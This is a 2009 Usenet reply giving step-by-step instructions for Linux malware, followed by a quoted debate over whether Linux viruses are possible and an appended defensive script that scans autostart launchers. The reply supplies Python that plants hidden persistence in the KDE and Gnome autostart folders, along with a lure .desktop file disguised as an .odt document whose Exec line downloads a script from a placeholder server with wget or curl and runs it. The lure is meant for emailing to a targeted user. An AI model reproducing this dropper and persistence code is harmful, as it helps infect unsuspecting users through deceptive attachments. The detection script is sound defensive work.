Re: How to write a linux virus
- From: "trehook@xxxxxxxxxxxxxx" <trehook@xxxxxxxxxxxxxx>
- Date: Fri, 3 Apr 2009 00:57:18 -0700 (PDT)
#
Write a piece of malware of your choice. Maybe as a Python script?
Good language, efficient code, pre-installed in most Linux distros and
powerful standard library support (for example, libraries for sending
HTTP requests and handling SMTP are part of most standard installs).
Place that malware on some web-server.
#
Your malware needs the ability to install a launcher for itself so
that it is started whenever the user logs in. As mentioned, for Gnome
that means creating a launcher description in the ~/.config/autostart
folder. For KDE just link to your executable from within the ~/.kde/
Autostart directory. To do that the malware code can either just force
the issue and copy a launcher or link to itself into both locations
(creating any directories along the way if they don't exist) or it can
be a bit smarter and choose the right thing to do based on the desktop
environment that it detects.
For example, to create the shortcut for KDE, all you need to write in
Python is:
import os
uname = os.getlogin()
drop_dir = “/home/%s/.kde/Autostart” % uname)
os.makedirs(drop_dir)
os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/
s.py")
For Gnome the Python script instead needs to write a launcher into the
proper directory:
import os
relauncher_str = """
[Desktop Entry]
Type=Application
Name=Malware
Exec=python .local/.hidden/s.py
Icon=system-run
"""
uname = os.getlogin()
drop_dir = “/home/%s/.config/autostart” % uname
os.makedirs(drop_dir)
f = open(drop_dir+”/Malware.desktop”, “w”)
f.write(relauncher_str)
f.close()
Writing these autostart entries is probably one of the first actions
that your malware should perform.
#
Now create a desktop launcher file for the installer of the malware,
which is different than the launcher we use to restart the malware
after a reboot. The desktop launcher for the installer is what we send
as attachment in the email to the targeted user. It's what the user
clicks on after they saved it. Try something like this:
[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ;
DROP=~/.local/.hidden ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
python $DROP/s.py'
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png
Hope it helps, but I tell you that it is a criminal act to create a Linux
virus, so never go to write it.
Trevor Hook.
On Mar 23, 5:01 am, houghi <hou...@xxxxxxxxxxxxxxxxxx> wrote:
Nikos Chantziaras wrote:
Same difference. There are enough people using it.
About 3%. The 97% of the rest are Macs and Windows boxes.
Others talk about other numbers.
Do you read security announcements? It is *PROOF* that there are
exploitable bugs. *PROOF*.
Sigh. I am not even going into the defence.
Why no one bothers to create malware that targets those exploits is up
to speculation. I say it's because of the market share. You however,
claim that "it can't be done". Why can't it be done?
So I need to prove a negative? Uh, sure.
Again, read the security announcements. Bugs are found all
the time. And you still claim "it can't be done?" It *could* be done.
There is a difference between an exploitable bug and a virus. We are
talking about viruses (or even worms). The exploitable bugs you talk
about all need some sort of user interaction and thus become trojans.
Software is software. Why should it matter whether you run kTorrent
on Windows or Linux? Will the Linux version be bugfree? Why? Same
goes for Mumble, Pidgin, etc.
OK, so you do not understand the difference between a bug and a virus.
Surely, it's a fact that there are exploits. The question is *why*
crackers don't bother with the 3% Linux desktops and only target the 97%.
And it is also a fact that there are no viruses for Linux. The reason
crackers do not target the 3% is because it can not be done.
Remember the bug in Linux a few months ago where standard users could
easily get root access? That is about the most dangerous bug that
happened to be available in a long time and could have been deadly. Yet
still no virus, because it would have needed still a user interaction.
Now if you say if Linux is susceptible to attacks, then I say yes. I
even made a proof of concept. All you need to do is trick the user to do
something. Yet that is not a virus.
Compare it to people on Windows who get an attachment in zip that they
need to open, read the file inside, enter a password and still people
are doing it and installing that stuff.
I can write malicious code for Linux as well. That does not mean Linux
is unsafe. I know you will stick with your point and keep shouting
*PROOF* and that I should read the security announcements and I will
keep saying "Viruses for Linux are not possible".
So if proof is so important to you, why not find people to prove me
wrong? It is as if saying "We should not let people carry liquids into a
plane, because they could build a bomb." and then ignore the people who
know what they are talking about who say that it can't be done.
And again I am sure that if there were a way to write a Linux virus,
people would have done so already a long time ago. (Heck, I even took
weeks off to come up with my cunning trojan.)
So unless you have nothing new to add to the discussion, I think we
both made our point and I am awaiting the first Linux virus in the wild.
houghi
--
For a long time now I have tried simply to write the best I can. Sometimes I
have good luck and write better than I can.
-- Ernest Hemingway
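
A defender's check for the two launcher patterns described in the post, added here as an example and not part of the original message: it audits `.desktop` files and autostart directories (such as `~/.config/autostart` and `~/.kde/Autostart`) for document-named application launchers, shell downloads in `Exec`, and references to hidden directories. The finding labels, regexes and sample entries are assumptions constructed for illustration.

```python
import os
import re

# Heuristics taken from the launcher patterns described in the post; tune before real use.
DOC_NAME = re.compile(r"\.(odt|ods|odp|pdf|docx?|xlsx?|txt|jpe?g|png)$", re.I)
FETCH = re.compile(r"\b(wget|curl)\b")
SHELL = re.compile(r"\b(ba|da|z)?sh\s+-c\b")
HIDDEN = re.compile(r"(^|[\s/])\.[A-Za-z0-9_]+/")  # a dot-directory inside a path

# Constructed samples (not captured from a real system; the host is a placeholder).
SAMPLE_LURE = ("[Desktop Entry]\nType=Application\nName=some_text.odt\n"
               "Exec=bash -c 'wget http://example.invalid/s.py -O ~/.local/.hidden/s.py'\n")
SAMPLE_BENIGN = "[Desktop Entry]\nType=Application\nName=Firefox\nExec=firefox %u\n"

def parse_desktop_entry(text):
    """Return key/value pairs from the [Desktop Entry] group only."""
    fields, in_group = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields

def audit_launcher(text):
    """Return the findings for the contents of one .desktop file."""
    f = parse_desktop_entry(text)
    exec_line, findings = f.get("Exec", ""), []
    if f.get("Type") == "Application" and DOC_NAME.search(f.get("Name", "")):
        findings.append("name-masquerades-as-document")
    if SHELL.search(exec_line) and FETCH.search(exec_line):
        findings.append("shell-download-in-exec")
    if HIDDEN.search(exec_line):
        findings.append("exec-references-hidden-path")
    return findings

def audit_autostart(directory):
    """Map each suspicious entry in an autostart directory to its findings."""
    report = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.islink(path) and HIDDEN.search(os.readlink(path)):
            report[name] = ["symlink-to-hidden-path"]
        elif name.endswith(".desktop") and os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                report[name] = audit_launcher(fh.read())
    return {name: found for name, found in report.items() if found}
```

Legitimate software also autostarts from dot-directories, so treat `exec-references-hidden-path` as a triage signal to review rather than a verdict.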